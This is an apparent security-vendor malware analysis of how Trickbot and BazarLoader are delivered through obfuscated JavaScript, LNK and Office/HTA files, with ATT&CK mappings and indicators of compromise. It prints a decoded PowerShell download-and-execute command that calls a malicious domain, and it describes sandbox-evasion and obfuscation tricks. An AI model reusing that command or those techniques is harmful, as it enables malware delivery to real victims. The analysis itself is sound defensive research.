The Zscaler ThreatLabz research team monitors thousands of files daily tracking new and pervasive threats, including one of the most prominent banking trojans of the last five years: Trickbot. Trickbot has been active since 2016 and is linked to a large number of malicious campaigns involving bitcoin mining and theft of banking information, personal identifying information (PII), and credentials. BazarLoader is a spinoff of this trojan, developed by the same authors. Both are particularly dangerous as they are easily modifiable and capable of delivering multi-stage payloads, as well as taking over computers entirely.
ThreatLabz has discovered Trickbot operators using new approaches to delivering payloads in recent attack campaigns. The malware samples we analyzed were well-crafted and highly obfuscated with sandbox-evading capabilities. In this blog post, we will show analysis of the different delivery vectors used by Trickbot and BazarLoader.
Key Points:
1. Script and LNK files added evasion techniques to leverage Malware threats.
2. Multilayer obfuscation is used to preclude analysis of JS and LNK files.
3. An Office attachment drops an HTA file with snippets of HTML and javascript functions.
4. Newly registered domains are used to deliver threats.
Trickbot is expanding its range of file types for malware delivery
In previous campaigns, Trickbot payloads were generally dropped as malicious attachments to Microsoft Office files. In the last month, we’ve seen that malware has also used javascript files at a high volume, along with a range of other file formats, as shown in the following charts:
Fig1:Trickbot blocked in the Zscaler Cloud Sandbox
Fig2:BazarLoader blocked in the Zscaler Cloud Sandbox
In this blog, we’ll walk through the attack chain for multiple delivery vectors, including:
Trickbot spreading through scripting files
Trickbot spreading through LNK files
BazarLoader spreading through Office attachments
Trickbot spreading through scripting files
Trickbot gains intrusion using spam emails bundled with malicious javascript attachments, such as the following:
Fig3:Spam email attachment
In this case, the Javascript [5B606A5495A55F2BD8559778A620F21B] file has three layers of obfuscation that are mostly used to evade and bypass sandbox environments. Below is the snapshot of the first obfuscated layer:
Fig4:First layer of obfuscation in javascript
In addition to taking extreme effort to make javascript files highly obfuscated, the malware authors have also added large amounts of junk code to the end to make debugging more difficult. The junk code is just random generated obfuscated strings that do not play any role with the malicious code.
Fig5:Junk code to make analysis difficult
Using the eval() function we have de-obfuscated the second layer in which malicious code is embedded with more junk code. After removing this layer of junk code, the eval() function is used once again to retrieve the final layer of code. We can see that the Trickbot authors used the setTimeout() method, which evaluates an expression after a 967 milliseconds to delay execution in the sandbox. This helps the malware evade sandbox environments.
Fig6: Second layer of obfuscation in javascript
In the above snapshot we are able to see the replace method implemented in the code where “"hdBDJ" and “tSJVh” strings are removed from the variables “YHPhEFtKjqbCmAZ” and “kVYJOrLSqvdAWnaGTX” respectively to get the final string.
Fig7:Final layer
The malicious Javascript executes cmd.exe as a child process, then cmd.exe executes powershell.exe to download Trickbot as payload.
Flow of execution:
Wscript.exe ->cmd.exe->powershell.exe
Powershell.exe embedded with base64 encoded command and after decoded following command is:
IEX (New-Object Net.Webclient).downloadstring(https://jolantagraban{.}pl/log/57843441668980/dll/assistant{.}php")
Fig8:Zscaler Cloud Sandbox detection of Javascript Downloader
Trickbot spreading through LNK files
Windows LNK (LNK) extensions are usually seen by users as shortcuts, and we have frequently observed cybercriminals using LNK files to download malicious files such as Trickbot. Trickbot hides the code in the argument section under the properties section of the LNK file. The malware author added extra spaces in between the malicious code to attempt to make it more difficult for researchers to debug the code. We’ve seen this technique used previously in the Emotet campaign using malicious Office attachments in 2018.
Fig9:Code embedded in the properties section of LNK
Downloading Trickbot :
LNK downloads the file from 45.148.121.227/images/readytunes.png using a silent argument so that the user is not able to see any error message or progress action.
After downloading, the malware saves the file to the Temp folder with the name application1_form.pdf.
Finally, the file is renamed from application1_form.pdf to support.exe and executed. Here, support.exe is Trickbot.
Fig10:Zscaler Cloud Sandbox detection of LNK Downloader
BazarLoader spreading through Office attachments
This is one of the other techniques used in TA551 APT aka Shathak. Malicious office documents drop the HTA file to “C\ProgramData\sda.HTA”. This HTA file contains HTML and vbscript designed to retrieve a malicious DLL to infect a vulnerable Windows host with BazarLoader.
Once macro-enabled, the mshta.exe process executes to download a payload. This campaign has been observed delivering BazarLoader and Trickbot in the past.
Fig11:Attack chain of DOC file to download BazarLoader
Base64 encoded data is implemented in the HTML <div> tag which is used later with javascript.
Fig12:Dropped HTA file : Malicious base64 encoded under HTML <div> section
Below is the snapshot of decode base64 data in which we can see it downloading the payload and saving as friendIFriend,jpg to the victim machine:
Fig13:Dropped HTA file : Decode Base64 data
Networking : C&C to download BazarLoader
Fig14:Sending request to download BazarLoader
We have also observed newly registered domains (NRDs) specifically created to distribute these payloads, using a stealer delivered through spam email and bundled with a malicious Microsoft Office attachment.
Fig15: Newly registered domain
Fig16:Zscaler Cloud Sandbox detection of Malicious Office file Downloader
JS.Downloader.Trickbot
Win32.Backdoor.BazarLoader
VBA.Downloader.BazarLoader
MITRE ATT&CK
T5190
Gather Victim Network Information
T1189
Drive-by Compromise
T1082
System Information Discovery
T1140
Deobfuscate/Decode Files or Information
T1564
Hide Artifacts
T1027
Obfuscated Files or Information
Indicators of Compromise
Md5
Filename
FileType
B79AA1E30CD460B573114793CABDAFEB
100.js
JS
AB0BC0DDAB99FD245C8808D2984541FB
4821.js
JS
192D054C18EB592E85EBF6DE4334FA4D
4014.js
JS
21064644ED167754CF3B0C853C056F54
7776.js
JS
3B71E166590CD12D6254F7F8BB497F5A
7770.js
JS
5B606A5495A55F2BD8559778A620F21B
68.js
JS
BA89D7FC5C4A30868EA060D526DBCF56
Subcontractor Reviews (Sep 2021).lnk
LNK
Md5
Filename
Filetype
C7298C4B0AF3279942B2FF630999E746
a087650f65f087341d07ea07aa89531624ad8c1671bc17751d3986e503bfb76.bin.sample.gz
DOC
3F06A786F1D4EA3402A3A23E61279931
-
DOC
Associated URLs:
jolantagraban.pl/log/57843441668980/dll/assistant.php
blomsterhuset-villaflora.dk/assistant.php
d15k2d11r6t6rl.cloudfront.net/public/users/beefree
C&C:
Domain
Payload
jolantagraban.pl
Trickbot
glareestradad.com
BazarLoader
francopublicg.com
BazarLoader
↧